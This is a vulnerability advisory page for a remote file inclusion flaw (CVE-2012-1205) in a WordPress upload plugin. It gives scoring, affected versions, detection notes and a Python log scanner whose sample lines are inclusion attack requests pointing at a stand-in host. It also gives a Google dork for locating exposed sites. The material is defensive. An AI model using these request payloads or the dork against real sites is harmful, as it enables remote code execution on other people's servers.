CVE-2012-1205
Published 2012-02-24
Priority: P262, high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 24.91% (97.6th percentile)
PHP remote file inclusion vulnerability in relocate-upload.php in Relocate Upload plugin before 0.20 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alanft | relocate-upload | <= 0.14 | — |
| alanft | relocate-upload | — | — |
| alanft | relocate-upload | — | — |
Detection & IOCs (extracted from sources)
- Detect GET requests to relocate-upload.php containing both 'ru_folder' and 'abspath' parameters, where 'abspath' contains a URL (remote file inclusion attempt).
- The vulnerable code passes the 'abspath' GET parameter directly into require_once() after urldecode(), allowing arbitrary remote PHP file inclusion. Monitor for HTTP requests where 'abspath' contains 'http://' or 'https://' schemes.
- Use the Google dork 'inurl:wp-content/plugins/relocate-upload' to identify exposed vulnerable WordPress installations.
- Vulnerability affects Relocate Upload plugin versions before 0.20; version 0.14 was confirmed tested by the researcher.
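
One way to apply the request-log checks listed above, as an added example that is not code from the plugin, the advisory or the sources this page indexes. It assumes combined-format web server access logs, and goes slightly beyond the bullets by matching any URL scheme in abspath and by decoding repeatedly, since the plugin calls urldecode() on an already decoded parameter. The log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format); hosts and values are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2012:10:01:02 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=x&abspath=http://host.example/a.txt HTTP/1.1" 200 512
203.0.113.7 - - [24/Feb/2012:10:01:09 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?abspath=hTTps%253A%252F%252Fhost.example%252Fa&ru_folder=x HTTP/1.1" 200 512
198.51.100.4 - - [24/Feb/2012:10:02:00 +0000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=x&abspath=/var/www/html/ HTTP/1.1" 200 90
198.51.100.4 - - [24/Feb/2012:10:02:05 +0000] "GET /index.php?abspath=http://host.example/ HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded scheme is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_rfi_attempt(line):
    """True if the line is a GET to relocate-upload.php carrying both
    ru_folder and abspath, with a URL scheme inside abspath."""
    m = REQUEST_RE.search(line)
    if not m or m.group("method") != "GET":
        return False
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/relocate-upload.php"):
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    if "ru_folder" not in params or "abspath" not in params:
        return False
    return any(SCHEME_RE.search(fully_decode(v)) for v in params["abspath"])


def scan(log_text):
    """Return (source IP, request target) for every matching log line."""
    return [(l.split()[0], REQUEST_RE.search(l).group("target"))
            for l in log_text.splitlines() if is_rfi_attempt(l)]


if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(ip, target)
```

A local filesystem path in abspath (third sample line) and an abspath parameter on an unrelated script (fourth line) are not flagged.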
- http://osvdb.org/79250
- http://plugins.trac.wordpress.org/changeset/504380/relocate-upload
- http://secunia.com/advisories/47976
- http://wordpress.org/extend/plugins/relocate-upload/changelog/
- http://www.securityfocus.com/bid/49693